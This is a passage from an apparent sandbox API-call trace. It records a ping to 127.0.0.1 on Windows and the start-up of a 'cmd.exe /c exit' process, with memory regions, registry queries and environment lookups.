lpszSrc="bytes=32 ", lpszDst=0x32f178, cchDstLength=0x9 | out: lpszDst="bytes=32 ") returned 1 [0051.353] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0051.353] _write (in: _FileHandle=1, _Buf=0x32f178*, _MaxCharCount=0x9 | out: _Buf=0x32f178*) returned 9 [0051.354] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0051.354] LocalFree (hMem=0x32f178) returned 0x0 [0051.354] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1ef864, nSize=0x0, Arguments=0x1ef860 | out: lpBuffer="xñ2") returned 0x9 [0051.354] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x32f178, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0051.354] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0051.354] _write (in: _FileHandle=1, _Buf=0x32f178*, _MaxCharCount=0x9 | out: _Buf=0x32f178*) returned 9 [0051.354] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0051.354] LocalFree (hMem=0x32f178) returned 0x0 [0051.354] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="xñ2") returned 0x9 [0051.354] CharToOemBuffA (in: lpszSrc="TTL=128\r\n", lpszDst=0x32f178, cchDstLength=0x9 | out: lpszDst="TTL=128\r\n") returned 1 [0051.354] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0051.354] _write (in: _FileHandle=1, _Buf=0x32f178*, _MaxCharCount=0x9 | out: _Buf=0x32f178*) returned 9 [0051.354] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0051.354] LocalFree (hMem=0x32f178) returned 0x0 [0051.354] Sleep (dwMilliseconds=0x3e8) [0052.368] IcmpSendEcho2Ex (in: IcmpHandle=0x321e28, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x32c7d0, RequestSize=0x20, RequestOptions=0x1ef888, ReplyBuffer=0x32cfb8, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x32cfb8) returned 0x1 [0052.369] inet_ntoa (in=0x100007f) returned="127.0.0.1" [0052.369] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="àV2") returned 0x16 [0052.369] CharToOemBuffA (in: lpszSrc="Reply from 127.0.0.1: ", lpszDst=0x3256e0, cchDstLength=0x16 | out: lpszDst="Reply from 127.0.0.1: ") returned 1 [0052.369] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0052.369] _write (in: _FileHandle=1, _Buf=0x3256e0*, _MaxCharCount=0x16 | out: _Buf=0x3256e0*) returned 22 [0052.370] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0052.370] LocalFree (hMem=0x3256e0) returned 0x0 [0052.370] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="xñ2") returned 0x9 [0052.370] CharToOemBuffA (in: lpszSrc="bytes=32 ", lpszDst=0x32f178, cchDstLength=0x9 | out: lpszDst="bytes=32 ") returned 1 [0052.370] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0052.370] _write (in: _FileHandle=1, _Buf=0x32f178*, _MaxCharCount=0x9 | out: _Buf=0x32f178*) returned 9 [0052.370] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0052.370] LocalFree (hMem=0x32f178) returned 0x0 [0052.370] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1ef864, nSize=0x0, Arguments=0x1ef860 | out: lpBuffer="xñ2") returned 0x9 [0052.370] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x32f178, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0052.370] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0052.370] _write (in: _FileHandle=1, _Buf=0x32f178*, _MaxCharCount=0x9 | out: _Buf=0x32f178*) returned 9 [0052.370] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0052.370] LocalFree (hMem=0x32f178) returned 0x0 [0052.370] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="xñ2") returned 0x9 [0052.370] CharToOemBuffA (in: lpszSrc="TTL=128\r\n", lpszDst=0x32f178, cchDstLength=0x9 | out: lpszDst="TTL=128\r\n") returned 1 [0052.370] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0052.370] _write (in: _FileHandle=1, _Buf=0x32f178*, _MaxCharCount=0x9 | out: _Buf=0x32f178*) returned 9 [0052.370] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0052.370] LocalFree (hMem=0x32f178) returned 0x0 [0052.370] Sleep (dwMilliseconds=0x3e8) [0053.382] IcmpSendEcho2Ex (in: IcmpHandle=0x321e28, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x32c7d0, RequestSize=0x20, RequestOptions=0x1ef888, ReplyBuffer=0x32cfb8, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x32cfb8) returned 0x1 [0053.383] inet_ntoa (in=0x100007f) returned="127.0.0.1" [0053.383] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="àV2") returned 0x16 [0053.383] CharToOemBuffA (in: lpszSrc="Reply from 127.0.0.1: ", lpszDst=0x3256e0, cchDstLength=0x16 | out: lpszDst="Reply from 127.0.0.1: ") returned 1 [0053.383] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0053.383] _write (in: _FileHandle=1, _Buf=0x3256e0*, _MaxCharCount=0x16 | out: _Buf=0x3256e0*) returned 22 [0053.384] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0053.384] LocalFree (hMem=0x3256e0) returned 0x0 [0053.384] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="xñ2") returned 0x9 [0053.384] CharToOemBuffA (in: lpszSrc="bytes=32 ", lpszDst=0x32f178, cchDstLength=0x9 | out: lpszDst="bytes=32 ") returned 1 [0053.384] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0053.384] _write (in: _FileHandle=1, _Buf=0x32f178*, _MaxCharCount=0x9 | out: _Buf=0x32f178*) returned 9 [0053.384] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0053.384] LocalFree (hMem=0x32f178) returned 0x0 [0053.384] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1ef864, nSize=0x0, Arguments=0x1ef860 | out: lpBuffer="xñ2") returned 0x9 [0053.384] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x32f178, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0053.384] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0053.384] _write (in: _FileHandle=1, _Buf=0x32f178*, _MaxCharCount=0x9 | out: _Buf=0x32f178*) returned 9 [0053.384] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0053.384] LocalFree (hMem=0x32f178) returned 0x0 [0053.384] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="xñ2") returned 0x9 [0053.384] CharToOemBuffA (in: lpszSrc="TTL=128\r\n", lpszDst=0x32f178, cchDstLength=0x9 | out: lpszDst="TTL=128\r\n") returned 1 [0053.384] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0053.384] _write (in: _FileHandle=1, _Buf=0x32f178*, _MaxCharCount=0x9 | out: _Buf=0x32f178*) returned 9 [0053.384] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0053.384] LocalFree (hMem=0x32f178) returned 0x0 [0053.384] getnameinfo (in: pSockaddr=0xf355e0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x1ef828, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0053.384] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x1ef7f8, nSize=0x0, Arguments=0x1ef7f4 | out: lpBuffer="èö2") returned 0x5c [0053.385] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x32f6e8, cchDstLength=0x5c | out: lpszDst="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0053.385] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0053.385] _write (in: _FileHandle=1, _Buf=0x32f6e8*, _MaxCharCount=0x5c | out: _Buf=0x32f6e8*) returned 92 [0053.385] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0053.385] LocalFree (hMem=0x32f6e8) returned 0x0 [0053.385] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x1ef808, nSize=0x0, Arguments=0x1ef804 | out: lpBuffer="èö2") returned 0x61 [0053.385] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x32f6e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0053.385] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0053.385] _write (in: _FileHandle=1, _Buf=0x32f6e8*, _MaxCharCount=0x61 | out: _Buf=0x32f6e8*) returned 97 [0053.385] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0053.385] LocalFree (hMem=0x32f6e8) returned 0x0 [0053.385] IcmpCloseHandle (IcmpHandle=0x321e28) returned 1 [0053.386] LocalFree (hMem=0x32c7d0) returned 0x0 [0053.386] LocalFree (hMem=0x32cfb8) returned 0x0 [0053.386] WSACleanup () returned 0 [0053.387] exit (_Code=0) Thread: id = 170 os_tid = 0xcf0 Thread: id = 171 os_tid = 0xcf4 Thread: id = 172 os_tid = 0xcf8 Process: id = "26" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7eef73e0" os_pid = "0xd04" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0xcc4" cmd_line = "cmd.exe /c exit" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1522 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1523 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1524 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1525 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1526 start_va = 0x49e50000 end_va = 0x49e9bfff entry_point = 0x49e5829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1527 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1528 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1529 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1530 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1531 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1532 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1533 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1534 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1535 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1536 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1537 start_va = 0x721b0000 end_va = 0x721b6fff entry_point = 0x721b1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1538 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1539 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1540 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1541 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1542 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1543 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1544 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1545 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1546 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1547 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1548 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1549 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1550 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1551 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1552 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1553 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1554 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1555 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 173 os_tid = 0xd08 [0053.454] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efc34 | out: lpSystemTimeAsFileTime=0x1efc34*(dwLowDateTime=0x51225540, dwHighDateTime=0x1d34280)) [0053.454] GetCurrentProcessId () returned 0xd04 [0053.454] GetCurrentThreadId () returned 0xd08 [0053.454] GetTickCount () returned 0x15215 [0053.454] QueryPerformanceCounter (in: lpPerformanceCount=0x1efc2c | out: lpPerformanceCount=0x1efc2c*=335371781) returned 1 [0053.455] GetModuleHandleA (lpModuleName=0x0) returned 0x49e50000 [0053.455] __set_app_type (_Type=0x1) [0053.455] __p__fmode () returned 0x768231f4 [0053.455] __p__commode () returned 0x768231fc [0053.455] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e721a6) returned 0x0 [0053.455] __getmainargs (in: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c, _DoWildCard=0, _StartInfo=0x49e74140 | out: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c) returned 0 [0053.455] GetCurrentThreadId () returned 0xd08 [0053.455] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd08) returned 0x38 [0053.455] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0053.455] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadUILanguage") returned 0x765e24c2 [0053.455] SetThreadUILanguage (LangId=0x0) returned 0x409 [0053.456] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0053.456] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efbc4 | out: phkResult=0x1efbc4*=0x0) returned 0x2 [0053.456] VirtualQuery (in: lpAddress=0x1efbfb, lpBuffer=0x1efb94, dwLength=0x1c | out: lpBuffer=0x1efb94*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.456] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efb94, dwLength=0x1c | out: lpBuffer=0x1efb94*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0053.456] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efb94, dwLength=0x1c | out: lpBuffer=0x1efb94*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0053.456] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efb94, dwLength=0x1c | out: lpBuffer=0x1efb94*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.456] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efb94, dwLength=0x1c | out: lpBuffer=0x1efb94*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.456] GetConsoleOutputCP () returned 0x1b5 [0053.456] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0053.456] SetConsoleCtrlHandler (HandlerRoutine=0x49e6e72a, Add=1) returned 1 [0053.456] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.456] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0053.456] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.456] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0053.456] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.456] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0053.457] _get_osfhandle (_FileHandle=0) returned 0x3 [0053.457] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0053.457] GetEnvironmentStringsW () returned 0x3801c8* [0053.457] FreeEnvironmentStringsW (penv=0x3801c8) returned 1 [0053.457] GetEnvironmentStringsW () returned 0x3801c8* [0053.457] FreeEnvironmentStringsW (penv=0x3801c8) returned 1 [0053.457] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb34 | out: phkResult=0x1eeb34*=0x40) returned 0x0 [0053.457] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x0, lpData=0x1eeb40*=0x0, lpcbData=0x1eeb38*=0x1000) returned 0x2 [0053.457] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x4, lpData=0x1eeb40*=0x1, lpcbData=0x1eeb38*=0x4) returned 0x0 [0053.457] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x0, lpData=0x1eeb40*=0x1, lpcbData=0x1eeb38*=0x1000) returned 0x2 [0053.457] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x4, lpData=0x1eeb40*=0x0, lpcbData=0x1eeb38*=0x4) returned 0x0 [0053.457] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x4, lpData=0x1eeb40*=0x40, lpcbData=0x1eeb38*=0x4) returned 0x0 [0053.457] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x4, lpData=0x1eeb40*=0x40, lpcbData=0x1eeb38*=0x4) returned 0x0 [0053.457] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x0, lpData=0x1eeb40*=0x40, lpcbData=0x1eeb38*=0x1000) returned 0x2 [0053.457] RegCloseKey (hKey=0x40) returned 0x0 [0053.457] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb34 | out: phkResult=0x1eeb34*=0x40) returned 0x0 [0053.457] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x0, lpData=0x1eeb40*=0x40, lpcbData=0x1eeb38*=0x1000) returned 0x2 [0053.457] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x4, lpData=0x1eeb40*=0x1, lpcbData=0x1eeb38*=0x4) returned 0x0 [0053.458] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x0, lpData=0x1eeb40*=0x1, lpcbData=0x1eeb38*=0x1000) returned 0x2 [0053.458] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x4, lpData=0x1eeb40*=0x0, lpcbData=0x1eeb38*=0x4) returned 0x0 [0053.458] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x4, lpData=0x1eeb40*=0x9, lpcbData=0x1eeb38*=0x4) returned 0x0 [0053.458] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x4, lpData=0x1eeb40*=0x9, lpcbData=0x1eeb38*=0x4) returned 0x0 [0053.458] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeb3c, lpData=0x1eeb40, lpcbData=0x1eeb38*=0x1000 | out: lpType=0x1eeb3c*=0x0, lpData=0x1eeb40*=0x9, lpcbData=0x1eeb38*=0x1000) returned 0x2 [0053.458] RegCloseKey (hKey=0x40) returned 0x0 [0053.458] time (in: timer=0x0 | out: timer=0x0) returned 0x59ddfa14 [0053.458] srand (_Seed=0x59ddfa14) [0053.458] GetCommandLineW () returned="cmd.exe /c exit" [0053.458] GetCommandLineW () returned="cmd.exe /c exit" [0053.458] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0053.458] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3801d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0053.458] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0053.458] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0053.458] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0053.458] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0053.458] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0053.458] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0053.458] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0053.458] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0053.458] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0053.458] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0053.458] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0053.459] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0053.459] _wcsicmp (_String1="KEYS", 